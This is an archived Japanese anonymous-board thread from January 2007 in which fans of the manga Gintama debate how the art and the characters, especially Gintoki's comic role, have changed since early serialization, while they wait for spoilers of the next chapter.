初期の銀さんは目が死んでいた。しかもマダオーラしかなかったのに比べ、最近は普通の侍になり下がってしまった。天人もどこかへ行ってしまった。でも私は…日本ショパンコンクールピアノに出たが16位だった。もう人生終わりだ。

308 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:05:08 ID:F6bwTZts
>>307ショパンコンクール出たのがすごいと思うんだが。
まあ頑張れ。

309 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:17:40 ID:VrHsLPDm
ショパコン16位の奴を探して晒そうじゃないか

310 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:19:18 ID:6ZviNTEd
銀時はアレか?
万事屋とか江戸に護るものができたから
目がきらめき始めたってこととか空知考えていたりするのか?

自分は銀時はツッコミよりボケが好きなんだが
最近ツッコミ多いな・・

311 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:21:21 ID:4Un6LDw2
亀で申し訳ないが第百四十八訓拡散して…
>>282
見つけることができなかった…


312 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:41:09 ID:6l/ciXqY
銀魂:目つきが悪くなった
新八:男らしくなった(前はまんまとみ子)
神楽:何か可愛くなった
お妙:顔つきが整ってより美人に
近藤:銀時と同じく目つきが悪くなった
ヅラ:銀時と区別がつく様になった
他は変化なし

313 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:57:46 ID:ob7Ag8wD
>>293
女キャラの目なんかはそんな雰囲気あるよな。

自分は最近攻殻SAC見た時、ジジババおっさんの描き方が似てると思った。
要はリアル系な顔の描き方ってだけだが。

314 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:03:49 ID:vVKL5sNj
さっちゃんがひばり君に見えた時期もありました

315 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:14:10 ID:VGOggqkr
>>310
自分も銀さんはボケのほうが好きだ
普段常識ない奴がツッコミやっても白々しい
テメーが言うなと思ってしまう

316 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:15:15 ID:jFgr8Peh
描いてくうちに変化すんのは仕方ないんじゃね?
ワンピースとかだって初期と今は全然違うし。
小畑のように緻密で繊細な絵ではないけど、味があるから好きだ

317 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:23:41 ID:6ZviNTEd
やっぱキャラが増えたから
誰がボケがツッコミかごちゃまぜだな・・

もう少しちょっとずつだして欲しいような気も・・
合コンの話は最初読んだときキャラの設定がわけわからなくなってしまった・・
カツラップは最高だったが

318 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:29:08 ID:VGOggqkr
ボケキャラ増えすぎて新八だけじゃツッコミきれないと言うのもあるんだろうな
九ちゃん辺りはツッコミキャラにすれば良かったのに

319 :名無しさんの次レスにご期待下さい:2007/01/07(日) 19:45:59 ID:hAB/MMqX
俺も銀時のツッコミは嫌い 銀時はやっぱボケキャラだろ ボケ飽和しすぎ
つか最近の神楽エロス…

320 :名無しさんの次レスにご期待下さい:2007/01/07(日) 20:05:52 ID:HdsEB1BE
銀さん最近全然ボケないよな。
ツッコミ方も蹴り→台詞でワンパタだし。

321 :名無しさんの次レスにご期待下さい:2007/01/07(日) 20:59:13 ID:VGOggqkr
初期のまだキャラが少ないときは
目が死んでてやる気なくて人の神経逆撫でするようなボケばかりするが時々きらめく主人公
だったが
ボケキャラの飽和した今ではもはや説教厨ということでしか
アイデンティティーを確立できてないような気が

322 :名無しさんの次レスにご期待下さい:2007/01/07(日) 21:09:39 ID:F6bwTZts
でも突っ込める相手がいっぱいできて嬉しいのかも。
漫画描く上でじゃなくて、設定として
あえて変えてきてるのかもしれん。



323 :名無しさんの次レスにご期待下さい:2007/01/07(日) 21:46:23 ID:CkTviFNv
>>322
それは空知=銀時と言っているのか?

324 :名無しさんの次レスにご期待下さい:2007/01/07(日) 21:54:32 ID:S7BGFpCx
銀さんがツッコミしたら
新八の存在意義がなくなるだろ

325 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:02:01 ID:VGOggqkr
新八だけじゃ捌ききれなくなったから止むを得ず銀さんをツッコミにしたんだろう

326 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:07:06 ID:F6bwTZts
>>323
ごめん、分かりにくいな。
嬉しいのは銀さん。

そういう設定にしてるのが空知。

327 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:10:40 ID:b/tU0oqC
第1訓の髪上げた?お妙さんとかもしれない運転の回の松子さんは似てるけど髪のツヤがうまくなってて感動した。

328 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:23:38 ID:S7BGFpCx
空知はね、やれば出来る子ですよ
まるですんごい絵が下手みたいに言われてますけどね
あれはあれ、漫画描けるだけですんごいですから、ええ
二ヶ月に一巻のペースで単行本出せるだけで、ほんとそれだけで立派ですよ、ええ

むしろね、どこが目でどこが鼻かわかるだけでも素晴らしいですよ
例えハーゲンダッツさえアシスタントに描かせていてもね、ええ

329 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:27:59 ID:VGOggqkr
>>327
ツヤベタは今はアシさんがやってると思われ

330 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:37:27 ID:Ezc6hhQl
最近は特に、すごく絵が上手くなった気がする空知
線が綺麗

331 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:00:35 ID:ClPWZ6Be
空知頑張れ

332 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:15:31 ID:6l/ciXqY
>>320
禿胴
やっぱ銀時のツッコミは糞

333 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:34:43 ID:VelxTrnm
銀時はツッコミに慣れてないから下手だしワンパなんだよ!
でも自分にもつっこめる相手がいるのが嬉しいんだよ!
と、思いました。

334 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:45:12 ID:Eb2Of3rt
銀時のせいじゃなくて空知の問題

335 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:52:49 ID:VGOggqkr
ツッコミなんてめんどくせーだけだと思う
ツッコミ入れてる銀さんよりボケて人からかってる銀さんのほうが楽そう
ツッコミ役はストレス溜まりそう

336 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:59:08 ID:VelxTrnm
それでも突っ込まずにはいられないほど
ヅラにはイライラしてるんじゃないだろうか
主に銀時が突っ込むのってヅラだよな?

337 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:09:57 ID:7hxhC8eh
主人公の影が薄くならないようにツッコミ役に回しているんだろう
新八が全部突っ込んでいたら銀さんの出番がなくなる
空知も一応バランスとか考えてるんだな

338 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:11:58 ID:YOcCDhHd
銀時は初老っぽさが良かった
マダオと溶け込んでる主人公に好感持ったわけで今の常識人っぽさは嘘くさい

逆に柳生編の新八や土方は他に比べて普通っぽさが浮いてて笑えたのに今は微妙だな
神楽・さっちゃんも真面目な殺し屋モードを見たい

339 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:14:08 ID:XayQmEvK
今の銀さんてそんなに常識人ぽいか?
芙蓉編の源外さんとの会話とか見た限りじゃ
そんなに初期と変わってないと思うけどな

340 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:14:16 ID:BXsxOg4G
>>336
合コンでは近藤にもツッコミしてた。

初期では「お前がいなかったら誰がツッコミするんだ。よし今週は俺がツッコミするか」って台詞あるよな。
今では銀時ツッコミ当たり前みたいになってる。

341 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:18:04 ID:XayQmEvK
近藤はヅラと同レベルだからなー
そういや今週はヅラに新八が突っ込んでたな
新八がいるときは基本的に新八に任すのか

342 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:23:30 ID:XJ6ycIxC
銀さんがツッコミに回る相手

神楽、ヅラ、近藤


ツッコミすら放棄した相手

さっちゃん

343 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:26:23 ID:N8n6Czz4
対坂本もツッコミっぽくね?

344 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:27:46 ID:B22Wai+T
銀時って神楽に突っ込んでるよな
いや、やらしい意味でじゃないよ?w
初期は神楽は銀時以上のボケキャラだったから銀時がツッコミに回ってたって意味ね
今は銀時もボケるから二重ボケで神楽の影が薄くなってるな

345 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:31:34 ID:Su5p6TpG
ボケ、強者揃いだなw

マダオのツッコミが何気に好きだ。哀愁を誘う

346 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:31:58 ID:7hxhC8eh
対坂本はツッコミというより暴力だな
殴るついでにツッコミしてるだけ

ツッコミ入れないで一緒にボケっぱなしでもいい気がする
ジャンプ争奪編の全蔵との掛け合いとか
ニンジャー編の罠にかかったときのヅラとの掛け合いとか
ボケっぱなしだけど面白かった

347 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:56:41 ID:2DPoXfPc
銀さんはめんどくさいだるい属性?がなくなってきてる気がする

348 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:32:21 ID:SLcRiXnO
銀さんは人を切りまくって白夜叉呼ばわりされるほどハイテンションな過去を持つ男だからね。
ちょっと気をぬくとテンションあがっちゃうんだよ。杉田のように。


349 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:36:26 ID:Egz2xskz
杉田って誰だよ

350 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:47:07 ID:BXsxOg4G
>>347
それ思う。気だるさがないよな。

351 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:48:01 ID:whjPwLU5
>>349
あにたま銀さんの中の人じゃね?

352 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:10:13 ID:2DPoXfPc
普段だるくないと、いざというときはやるみたいなキャラが生きてこないような。
あと甘い物とかくだらないことになぜか張り切るみたいな感じが…

353 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:25:28 ID:qZp0VpfH
神楽のボケって最近、対銀時専用ぽくね?
なんか銀さんに突っ込まれるとか
銀さんも同調して二重ボケかますとかな感じのボケしかしてなくない?
なんか可愛いから好きだけど。変な意味じゃなく。

354 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:32:31 ID:KWRTbxH2
まあ要するに初期のころからしたらいろいろと変わったよねっていう

355 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:47:39 ID:2DPoXfPc
キャラ増えたし、万事屋も長く過ごして人間関係も出合ったばっかりのころとは変化してきたんだろう

356 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:24:40 ID:BMsQ7fic
神楽と銀時は極めて親子っぽい
でもだから、新八ってどういう位置にくるんだろうとはたまに思う

357 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:37:41 ID:ebBApvms
昔の銀さんは気だるそうにツッコむかボケをボケで返して新八にツッコミされてたのに
今の銀さんは足で必死にツッコんでばっかだなorz

358 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:43:02 ID:ZhBg4L7m
グダグダ文句言うならてめーらが話し考えて書けや
『連載初期は〜』の連発うざい。
変わらなかったら変わらなかったで飽きてきたとか言うんだろ?

359 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:51:46 ID:SLcRiXnO
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は
連載初期は 連載初期は 連載初期は 連載初期は 連載初期は



                 そういえば新八って変な着物着てたよね

360 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:13:34 ID:WLM1TZuj
銀時と神楽はボケと悪ふざけ担当
新八は突っ込み担当

361 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:40:04 ID:3rUndlz0
とにかくみんな連載初期ころに戻って欲しいってことでしょ

362 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:13:27 ID:+jXXUYZi
総意みたいに言うのやめてくんない

363 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:42:01 ID:SLcRiXnO
>>361
人をただの打ち切りギリギリなマンガが大好きな人みたいに言うな

364 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:48:27 ID:r6vFwfVa
銀さん最近あくが抜けて魅力薄れてきてる。それとオサレがキモイ
空知、昔を思い出せ!
銀さんはもっとダメで嫌な奴だったろ!

365 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:56:04 ID:5+TaW//s
何か銀時アンチな流れになってるな

366 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:41:00 ID:okf7EvTs
銀さんギャグ話だと空気っぽい
シリアス話で説教厨になってる時が一番生き生きしてる

367 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:47:30 ID:qwVM93sG
しょうがないよ
どんな漫画も変わってしまうもんだ

368 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:05:30 ID:69X4Z5bT
大西という名前の完璧超人なキャラが出てきてそれまでの展開や
人間関係をぶっ壊すまでは大丈夫

腐女子より担当に媚びている漫画家の方がキモい

369 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:12:05 ID:A1/59L8w
腐女子のありがたい意見

370 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:13:43 ID:7RamHvdY
なんでスルーしないんだ?

371 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:16:17 ID:Ojypv/u0
>>356
皆家族でいろんな位置にいると思うんだが
そういう万事屋のよく分からないけどがっしりした絆が好きだ

銀さんはけだるい、だるいっていう性格をいかしてボケたりつっこんだりすれば
いいんじゃね?

372 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:18:55 ID:B22Wai+T
>>356
新八も神楽も親子とは少し違わね?
一応赤の他人なんだけど、年や性の分け隔てなく全員が揃ってバカやってる
………小学4年生みたいな感じ?どこか懐かしい

373 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:24:35 ID:U1jllESJ
でも紅桜編みたいなのはたまにやられると普段のちゃらんぽらんなギャグとのギャップのせいで
カッケエエエエエ銀魂カッケエエエエって思ったりもするのであった

374 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:09:17 ID:yAYl2Jw1
いや、万事屋内の関係性を始めとしてキャラとかは
一応歳月の経過に合わせて変化してきてるんじゃねーの?
ヅラが変化して穏健派になってきたように。

375 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:12:24 ID:B22Wai+T
>>373
そして柳生編やミツバ編でやっぱツマンネ(^ω^;)ってなるんだよな…

376 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:21:35 ID:7RamHvdY
それは人によるだろ

377 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:27:15 ID:CCLT9+4U
柳生編は長いけど所々にギャグが散りばめられてて、個人的には面白かった

378 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:30:32 ID:7hxhC8eh
新八が長年万事屋にいて初期に比べると多少常識がなくなったり
神楽が銀さんにそっくりになってきたように
銀さんに新八のようなツッコミ癖がうつっても不思議ではないかもしれない
家族ってずっと一緒にいるせいか似てくるから

379 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:34:22 ID:h5xbtwcU
神楽が銀さんそっくりだと!?どこがじゃホゲェ!

つかただたんに空知が家族がどうこうっていう効果を狙ってるんじゃなくてさぁ
漫画描いてるうちにキャラ増えて主役群がオールマイティな感じになっちゃってるんだと思うんですけど

380 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:37:00 ID:xP6L354U
新八は将来ニートで説教好きのアイドルヲタか
悲惨だな。

381 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:39:40 ID:U1jllESJ
>>379
グラさんんんんんん!!!

382 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:47:36 ID:r6vFwfVa
>>380
ニートじゃお妙さんに殺されるから、説教好きのアイドルオタの会社員になるんじゃないの

383 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:47:52 ID:odYMd2OU
万画に比べたら銀魂は変わってない方。
剣に一本なんてね…すさまじいから

384 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:54:19 ID:UnBPQeWM
天下のジャンプで3年も連載してるのにバトル長編漫画になってないのはすごいとオモ
最初短編やってても二年持たない奴が多いのに立派なもんだ

385 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:27:17 ID:EWqPcWev
まあキャラ増えてきてゴチャゴチャしてきただけだろ
かもしれない運転はいい感じにまとまってたし
もうちょい人少なく出せばいいのにな・・

そういえば万事屋ってあんまり依頼きてない気がするんだが
昔はもうちょいあったよな

386 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:36:49 ID:b1YueCkS
>>384
バトル長編漫画は自分には向いてないと空知は柳生編で思い知らされたんじゃない?

387 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:45:11 ID:7hxhC8eh
>>385
今やってるのも一応依頼

388 :名無しさんの次レスにご期待下さい:2007/01/08(月) 17:14:58 ID:qwVM93sG
確かに

389 :名無しさんの次レスにご期待下さい:2007/01/08(月) 17:55:56 ID:U1jllESJ
万事屋三人組のアホさはいいよなぁ

390 :名無しさんの次レスにご期待下さい:2007/01/08(月) 18:33:33 ID:2DPoXfPc
銀魂 まだまだ続くぜ!

391 :名無しさんの次レスにご期待下さい:2007/01/08(月) 19:02:04 ID:SLcRiXnO
そうだぜ!
銀さんたちの旅はまだまだ始まったばかりだぜ!

392 :名無しさんの次レスにご期待下さい:2007/01/08(月) 19:09:29 ID:woh3aIUz
銀さんたちはグランドラインに入って二度と帰ってこなかったんだぜ!

393 :名無しさんの次レスにご期待下さい:2007/01/08(月) 20:34:38 ID:SLcRiXnO
空知先生の次回作にご期待くださいだぜ!あれ?最終回?

394 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:48:04 ID:KWRTbxH2
心理描写というか声を出さずにつっこむシーンが多くなった

395 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:27:30 ID:u5A9HRMF
ちょwwwwwフラグ立てすぎwwwwww

普通の脳内突っ込みをフキダシじゃなくモノローグっぽく
描いてるのがなんかきもい。
あとギャグでもネタそのものは面白いのに無駄に長いセリフで
ダラダラ助長されてキレが損なわれてる気がする。
もっと短いセリフなら笑えるのに、って時が結構ある。

396 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:49:27 ID:SD9UE4cU
なんかバレ来ないからって空知ダメ出しスレになってるな
そろそろこの話題やめようぜ、おとなしくバレまとうや

397 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:27:48 ID:B22Wai+T
>>396
何週間バレ来ないと思ってんだ

398 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:51:41 ID:vV8nlfda
次にネタバレ来るのっていつだっけ
来週の木曜?

399 :名無しさんの次レスにご期待下さい:2007/01/09(火) 00:00:46 ID:1z6Oa1PU
今週中に画バレがきそうな予感

400 :名無しさんの次レスにご期待下さい:2007/01/09(火) 00:04:19 ID:Zz/2qGoA
は、しないのであった。

401 :名無しさんの次レスにご期待下さい:2007/01/09(火) 00:13:49 ID:v5GLXhCP
間に休日あれば早く来るかもしれないがな
今回は普通どおりじゃない

402 :名無しさんの次レスにご期待下さい:2007/01/09(火) 09:30:28 ID:yQGZFlrU
昨日コンビニ行ったらジャンプ売り切れてた俺に
慰めの言葉をくれ

403 :名無しさんの次レスにご期待下さい:2007/01/09(火) 09:49:52 ID:gDlGrhz+
まったく 大事な発売日くらいチェックしとけよ お前
略してマダオだなw

404 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:14:13 ID:FKGZqxjK
うまい!

405 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:22:21 ID:t7KmYY/T
あれ?前が霞んで見えないや…

406 :太助より:2007/01/09(火) 14:34:37 ID:aD6Upr70
>>402
マジヤバイんだけどソレ
マジヤバイよ
どれぐらいヤバイかっていうとマジヤバイ

407 :名無しさんの次レスにご期待下さい:2007/01/09(火) 15:30:11 ID:j+1mnldd
ヤバイヨヤバイヨー

82 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)